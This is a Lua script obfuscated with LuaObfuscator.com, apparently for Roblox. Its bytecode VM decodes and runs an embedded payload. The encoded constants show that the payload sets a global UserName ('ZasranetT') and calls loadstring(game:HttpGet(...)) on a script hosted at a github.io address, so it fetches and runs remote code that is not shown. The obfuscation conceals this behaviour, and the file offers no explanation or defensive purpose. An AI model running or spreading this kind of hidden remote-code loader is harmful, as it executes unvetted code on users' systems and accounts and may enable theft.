--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v73=(v31/(((1642 -(1523 + 114)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((838 + 94) -(857 + (105 -31))))) ;return v73-(v73%((1634 -(68 + 997)) -(367 + 201))) ;else local v74=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((1248 + 25) -(226 + 1044)) );v19=v19 + (17 -13) ;return (v37 * 16777216) + (v36 * 65536) + (v35 * ((83 + 290) -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v65=0;while true do if (0==v65) then if (v38~=3) then else local v96=0 -0 ;local v97;while true do if (v96~=0) then else v97=0 + 0 ;while true do if (0==v97) then for v106=1 + 0 ,v24() do v40[v106-1 ]=v29();end for v108=1,v24() do v41[v108]=v24();end v97=1;end if (1==v97) then return v42;end end break;end end end if (v38==(255 -(163 + 91))) then v42={v39,v40,nil,v41};v43=v24();v44={};v38=2;end v65=3 -2 ;end if (v65~=(1 -0)) then else if (v38==2) then local v98=0;local v99;while true do if (v98==0) then v99=0;while true do if (0~=v99) then else local v103=0;while true do if (v103~=0) then else for v120=1 + 0 ,v43 do local v121=0 -0 ;local v122;local v123;local v124;local v125;local v126;while true do if (v121==1) then v124=nil;v125=nil;v121=2;end if (v121==(0 + 0)) then v122=0;v123=nil;v121=1475 -(1329 + 145) ;end if (v121~=(973 -(140 + 831))) then else v126=nil;while true do if (v122~=0) then else v123=1850 -(1409 + 441) ;v124=nil;v122=719 -(15 + 703) ;end if (v122~=2) then else while true do if (v123~=1) then else v126=nil;while true do if (v124==(0 + 0)) then local v175=0;local v176;while true do if (v175~=(438 -(262 + 176))) then else v176=1721 -(345 + 1376) ;while true do if (v176~=(689 -(198 + 490))) then else v124=1;break;end if (v176~=(0 -0)) then else local v189=0 -0 ;while true do if ((1206 -(696 + 510))~=v189) then else local v193=0 -0 ;while true do if ((1262 -(1091 + 171))~=v193) then else v125=v22();v126=nil;v193=1;end if (1~=v193) then else v189=1 + 0 ;break;end end end if (1~=v189) then else v176=3 -2 ;break;end end end end break;end end end if (v124~=(3 -2)) then else if (v125==1) then v126=v22()~=(374 -(123 + 251)) ;elseif (v125==(9 -7)) then v126=v25();elseif (v125~=3) then else v126=v26();end v44[v120]=v126;break;end end break;end if (v123~=0) then else local v166=698 -(208 + 490) ;while true do if ((1 + 0)~=v166) then else v123=1 + 0 ;break;end if (v166~=(836 -(660 + 176))) then else v124=0 + 0 ;v125=nil;v166=1;end end end end break;end if (1~=v122) then else local v150=0;while true do if (v150==(203 -(14 + 188))) then v122=677 -(534 + 141) ;break;end if (v150~=(0 + 0)) then else v125=nil;v126=nil;v150=1 + 0 ;end end end end break;end end end v42[3]=v22();v103=1;end if (v103==(1 + 0)) then v99=1 -0 ;break;end end end if (v99==1) then for v110=1 -0 ,v24() do local v111=0;local v112;local v113;local v114;while true do if ((2 -1)~=v111) then else v114=nil;while true do if (v112~=(0 + 0)) then else local v147=0;local v148;while true do if (v147~=0) then else v148=0 + 0 ;while true do if (v148==1) then v112=1;break;end if (v148~=0) then else local v167=396 -(115 + 281) ;while true do if (0==v167) then v113=0 -0 ;v114=nil;v167=1;end if (v167==(1 + 0)) then v148=2 -1 ;break;end end end end break;end end end if (v112==1) then while true do if (v113==0) then v114=v22();if (v21(v114,1,3 -2 )~=0) then else local v158=0;local v159;local v160;local v161;local v162;while true do if (v158==1) then local v173=867 -(550 + 317) ;while true do if (v173~=(0 -0)) then else v161=nil;v162=nil;v173=1;end if (v173~=(1 -0)) then else v158=2;break;end end end if (v158==(5 -3)) then while true do if (v159~=0) then else local v178=0;while true do if ((285 -(134 + 151))~=v178) then else v160=v21(v114,2,3);v161=v21(v114,1669 -(970 + 695) ,11 -5 );v178=1;end if ((1991 -(582 + 1408))~=v178) then else v159=3 -2 ;break;end end end if (v159==(3 -0)) then if (v21(v161,3,11 -8 )==1) then v162[4]=v44[v162[4]];end v39[v110]=v162;break;end if (v159~=(1826 -(1195 + 629))) then else local v180=0 -0 ;local v181;while true do if (v180==(241 -(187 + 54))) then v181=780 -(162 + 618) ;while true do if (v181==1) then v159=3 + 0 ;break;end if (v181==(0 + 0)) then local v191=0;while true do if (v191~=(1 -0)) then else v181=1;break;end if (v191==0) then if (v21(v161,1 -0 ,1 + 0 )==(1637 -(1373 + 263))) then v162[2]=v44[v162[2]];end if (v21(v161,2,1002 -(451 + 549) )~=1) then else v162[3]=v44[v162[1 + 2 ]];end v191=1 -0 ;end end end end break;end end end if (v159==(1 -0)) then v162={v23(),v23(),nil,nil};if (v160==(0 + 0)) then local v186=0 -0 ;local v187;local v188;while true do if (v186==(342 -(218 + 123))) then while true do if (v187~=(1581 -(1535 + 46))) then else v188=0 + 0 ;while true do if (v188==0) then v162[3]=v23();v162[4]=v23();break;end end break;end end break;end if (v186==0) then v187=0 + 0 ;v188=nil;v186=1;end end elseif (v160==1) then v162[3]=v24();elseif (v160==2) then v162[563 -(306 + 254) ]=v24() -(2^(1 + 15)) ;elseif (v160~=(5 -2)) then else local v194=0;while true do if ((1467 -(899 + 568))==v194) then v162[3]=v24() -(2^(11 + 5)) ;v162[9 -5 ]=v23();break;end end end v159=605 -(268 + 335) ;end end break;end if (v158~=0) then else local v174=0;while true do if (v174~=(290 -(60 + 230))) then else v159=572 -(426 + 146) ;v160=nil;v174=1;end if (v174==(1 + 0)) then v158=1457 -(282 + 1174) ;break;end end end end end break;end end break;end end break;end if (v111==(811 -(569 + 242))) then v112=0;v113=nil;v111=1;end end end v38=8 -5 ;break;end end break;end end end if (v38~=(0 + 0)) then else v39={};v40={};v41={};v38=1;end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=v24();local v46=v24();local v47=1025 -(706 + (484 -(122 + 44))) ;local v48=(v21(v46,1252 -(721 + 530) ,(187 + 1104) -(945 + 326) ) * ((4 -2)^(1354 -(1249 + 73)))) + v45 ;local v49=v21(v46,19 + 2 ,1176 -(466 + 679) );local v50=((v21(v46,732 -((548 -277) + 429) )==(2 -(1 -0))) and  -(1 + 0)) or (1501 -(1408 + (304 -212))) ;if (v49==(1086 -(461 + 625))) then if (v48==(1288 -((1058 -(30 + 35)) + 295))) then return v50 * (0 + 0) ;else v49=2 -1 ;v47=114 -(4 + 110) ;end elseif (v49==(3218 -(418 + 753))) then return ((v48==(0 + 0)) and (v50 * ((1 + 0)/(0 + 0)))) or (v50 * NaN) ;end return v8(v50,v49-(300 + 723) ) * (v47 + (v48/((1 + 1)^(150 -(80 + 18))))) ;end v26=nil;function v26(v51)local v52;if  not v51 then local v75=1257 -((1623 -(361 + 219)) + 214) ;while true do if ((0 -0)==v75) then v51=v24();if (v51==(1212 -(323 + 889))) then return "";end break;end end end v52=v3(v16,v19,(v19 + v51) -1 );v19=v19 + v51 ;local v53={};for v66=2 -1 , #v52 do v53[v66]=v2(v1(v3(v52,v66,v66)));end return v6(v53);end v18=5;end if (v18==2) then function v22()local v54=v1(v16,v19,v19);v19=v19 + 1 ;return v54;end v23=nil;function v23()local v55=320 -(53 + 267) ;local v56;local v57;while true do if (v55==(0 + 0)) then v56,v57=v1(v16,v19,v19 + (415 -(15 + 398)) );v19=v19 + (984 -(18 + (1814 -(20 + 830)))) ;v55=3 -2 ;end if (v55==(1 + 0)) then return (v57 * (127 + 35 + 94)) + v56 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v58)if (v1(v58,2)==79) then v20=v0(v3(v58,1,1));return "";else local v76=0;local v77;while true do if (v76==0) then v77=v2(v0(v58,16));if v20 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v77,v20);v20=nil;v100=1;end end else return v77;end break;end end end end);v18=1;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v78=v62;local v79=v63;local v80=v64;local v81=v28;local v82={};local v83={};local v84={};for v88=126 -((922 -(118 + 688)) + (58 -(25 + 23))) ,v71 do if ((v88>=v80) or (2048==(224 + 2807))) then v82[v88-v80 ]=v70[v88 + ((144 + 595) -(542 + 196)) ];else v84[v88]=v70[v88 + (1 -0) ];end end local v85=(v71-v80) + 1 + (1886 -(927 + 959)) ;local v86;local v87;while true do local v89=0 + 0 ;local v90;while true do if ((v89==(0 + 0)) or ((3159 -1960)>=(5560 -3391))) then v90=1551 -(1126 + (1432 -1007)) ;while true do if ((v90==(405 -(118 + (1019 -(16 + 716))))) or ((2492 -1856)==(3023 -(118 + 1003)))) then local v102=0 -0 ;while true do if ((v102==0) or ((5216 -(142 + 235))<=3280)) then v86=v78[v68];v87=v86[4 -3 ];v102=1 + 0 ;end if ((v102==(978 -((1067 -514) + 424))) or (3674<=(3709 -1747))) then v90=1;break;end end end if ((v90==(1 + 0)) or ((1879 + 15)<((916 -(11 + 86)) + 587))) then if (((669 + 903)>=(875 + (1599 -943))) and (v87<=5)) then if ((v87<=(4 -2)) or ((13059 -8372)<(10169 -5627))) then if (((957 + 2334)>(8056 -(6674 -(175 + 110)))) and (v87<=(0 -0))) then v68=v86[756 -(239 + 514) ];elseif ((v87==((4 -3) + 0)) or ((2202 -(797 + 532))==((3274 -(503 + 1293)) + 556))) then v84[v86[(2 -1) + 1 ]]=v86[6 -3 ];else v61[v86[1205 -(373 + 829) ]]=v84[v86[733 -(476 + 255) ]];end elseif ((v87<=3) or ((3946 -(267 + 102 + (1822 -(810 + 251))))<11)) then for v127=v86[2 + 0 ],v86[(4 + 1) -2 ] do v84[v127]=nil;end elseif (((7009 -3310)<(4944 -(64 + 174))) and (v87>(1 + 0 + 3 + 0))) then local v133=0 -0 ;local v134;local v135;local v136;local v137;local v138;while true do if ((2646>=(1212 -(144 + 192))) and ((218 -(42 + 174))==v133)) then v138=nil;while true do if (((462 + 152)<=(2638 + 546)) and (v134==1)) then local v151=0 + 0 ;while true do if (((4630 -(363 + (1674 -(43 + 490))))==3126) and (v151==(1580 -(1183 + 397)))) then v69=(v137 + v135) -(2 -1) ;v138=0 + 0 ;v151=1 + 0 ;end if ((v151==((2709 -(711 + 22)) -((7399 -5486) + 62))) or (2187>=4954)) then v134=2;break;end end end if ((v134==(2 + 0)) or ((10263 -6386)==3575)) then for v163=v135,v69 do local v164=1933 -(565 + 1368) ;local v165;while true do if (((2658 -1951)>(2293 -(1477 + 184))) and (v164==(859 -(240 + 619)))) then v165=0 -0 ;while true do if ((v165==(0 + 0 + 0)) or ((1402 -(564 + 292))>=(4630 -1946))) then v138=v138 + (2 -1) ;v84[v163]=v136[v138];break;end end break;end end end break;end if ((1465<=(4605 -(244 + 60))) and (v134==(0 + 0))) then local v152=476 -(41 + (691 -256)) ;while true do if (((2705 -(938 + 63))>(1096 + 22 + 307)) and ((1126 -(936 + 189))==v152)) then v134=1;break;end if ((v152==((1744 -(1344 + 400)) + 0)) or (687==4234)) then v135=v86[407 -(255 + 150) ];v136,v137=v81(v84[v135](v13(v84,v135 + 1 ,v86[1616 -(1565 + 48) ])));v152=1 + 0 + 0 ;end end end end break;end if (((1138 -(782 + 356))==v133) or ((3597 -(176 + 91))<(3722 -(1228 + 1065)))) then v134=0 -0 ;v135=nil;v133=1;end if ((1147>=(1427 -(975 + 117))) and ((1876 -(157 + 1718))==v133)) then v136=nil;v137=nil;v133=2 + 0 ;end end else local v139=0 -0 ;local v140;local v141;local v142;while true do if (((11743 -8308)>(3115 -(697 + 321))) and (v139==(2 -1))) then v142=nil;while true do if ((v140==(1 -0)) or ((16107 -12337)>=((30086 -20771) -5274))) then v84[v141 + 1 + 0 ]=v142;v84[v141]=v142[v86[4]];break;end if ((v140==(0 -(1739 -(404 + 1335)))) or ((10162 -6371)<=((3244 -(183 + 223)) -((391 -69) + 905)))) then local v156=611 -(602 + 6 + 3) ;while true do if (((1189 -(449 + 740))==v156) or (4578<=(2880 -(826 + 46)))) then v141=v86[2];v142=v84[v86[950 -(245 + 702) ]];v156=3 -2 ;end if (((362 + 763)<=(3974 -(260 + 1638))) and ((441 -(382 + 21 + 37))==v156)) then v140=3 -2 ;break;end end end end break;end if ((v139==(0 + 0)) or ((1534 -791)>=(13076 -8677))) then v140=0;v141=nil;v139=1206 -(902 + 303) ;end end end elseif ((1155<(3672 -1999)) and (v87<=8)) then if ((v87<=6) or ((5597 -(3610 -(10 + 327)))<=(50 + 528))) then v84[v86[1692 -(1121 + 569) ]]=v86[217 -(22 + 192) ]~=((476 + 207) -(483 + 200)) ;elseif ((3767==(5230 -(1404 + 59))) and (v87>(19 -12))) then do return;end else v84[v86[2 -0 ]]();end elseif ((4089==(4854 -(468 + 297))) and (v87<=(571 -(334 + 228)))) then v84[v86[340 -(118 + 220) ]]=v61[v86[10 -7 ]];elseif ((4458>=(3879 -2205)) and (v87>(18 -8))) then if (((277 + 695)<=(1654 -(141 + 95))) and (v84[v86[2]]==v86[4 + 0 ])) then v68=v68 + (2 -1) ;else v68=v86[6 -3 ];end else local v143=0 + 0 + (449 -(108 + 341)) ;local v144;local v145;local v146;while true do if ((1==v143) or ((13529 -8591)<(3348 + 1414))) then v146=nil;while true do if ((v144==(0 + 0 + 0)) or ((3525 -1021)>(2516 + 1748))) then local v157=163 -(92 + 71) ;while true do if (((1064 + 1089)==(3619 -1466)) and (v157==((3238 -2472) -(574 + 191)))) then v144=1 + 0 ;break;end if ((v157==(0 -0)) or ((259 + 248)>=(3440 -(254 + 595)))) then v145=0;v146=nil;v157=127 -(55 + 71) ;end end end if (((5902 -1421)==4481) and (v144==1)) then while true do if ((v145==(1790 -(573 + 1217))) or ((6447 -4119)<(53 + 640))) then v146=v86[2 -0 ];v84[v146]=v84[v146](v13(v84,v146 + ((2433 -(711 + 782)) -(714 + 225)) ,v69));break;end end break;end end break;end if ((((24244 -11597) -8319)==(6033 -1705)) and (v143==0)) then v144=0;v145=nil;v143=1 + 0 ;end end end v68=v68 + (1 -0) ;break;end end break;end end end end A,B=v28(v11(v72));if  not A[1] then local v91=v59[4][v68] or "?" ;error("Script error at ["   .. v91   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365724E616D6503093O005A617372616E657454030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F72692O7A36392E6769746875622E696F2F4D61696E2E6C756100163O0012013O00014O0003000100013O00260B3O00020001000100044O00020001001201000100013O00260B000100050001000100044O00050001001201000200033O001202000200023O001209000200043O001209000300053O002004000300030006001201000500074O0006000600014O0005000300064O000A00023O00022O000700020001000100044O0015000100044O0005000100044O0015000100044O000200012O00083O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
